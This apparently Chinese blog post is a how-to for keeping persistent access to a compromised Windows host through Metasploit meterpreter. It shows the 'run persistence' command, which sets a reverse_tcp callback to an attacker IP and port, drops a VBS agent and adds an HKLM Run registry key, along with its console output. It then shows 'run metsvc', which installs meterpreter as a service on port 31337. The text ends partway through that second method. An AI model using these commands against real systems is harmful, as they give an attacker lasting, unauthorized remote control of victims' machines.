meterpreter 持久化訪問的多種方式
阿新 • • 發佈:2019-01-09
meterpreter 在獲取shell之後,如何持續控制目標主機,即在目標主機重啟或下次開機後能自動連線到攻擊主機上,不必每次都需要進行攻擊取得 meterpreter。
1. 通過persistence指令碼
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
#
-X 開機自啟動
#
-i <num> payload重連的間隔時間
#
-p 反向連線埠號
#
-r 反向連線IP地址 #
#
更多使用方法請參考幫助 run persistence -h
#
meterpreter
> run persistence -X -i 5 -p 4444 -r 192.168.3.12
[*]
Running Persistance Script
[*]
Resource file
for
cleanup created at /root/ .msf5 /logs/persistence/EVAN_20160604 .3957 /EVAN_20160604 .3957.rc
[*]
Creating Payload=windows /meterpreter/reverse_tcp
LHOST=192.168.3.12 LPORT=4444
[*]
Persistent agent script is 148461 bytes long
[+]
Persistent Script written to C:\DOCUME~1\wangjun\LOCALS~1\Temp\VKZehDGmg.vbs
[*]
Executing script C:\DOCUME~1\wangjun\LOCALS~1\Temp\VKZehDGmg.vbs
[+]
Agent executed with PID 3892
[*]
Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\UymiaoVKhfXxH [+]
Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\UymiaoVKhfXxH
|
2. 通過metsvc服務的方式
執行”run metsvc”將會在目標主機上以Meterpreter的服務的形式註冊在服務列表中,並開機自動自動。執行”run metsvc -r”解除安裝目標主機上的Meterpreter服務。
1 2 3 4 5 6 7 8 9 10 |
meterpreter
> run metsvc
[*]
Creating a meterpreter service on port 31337
|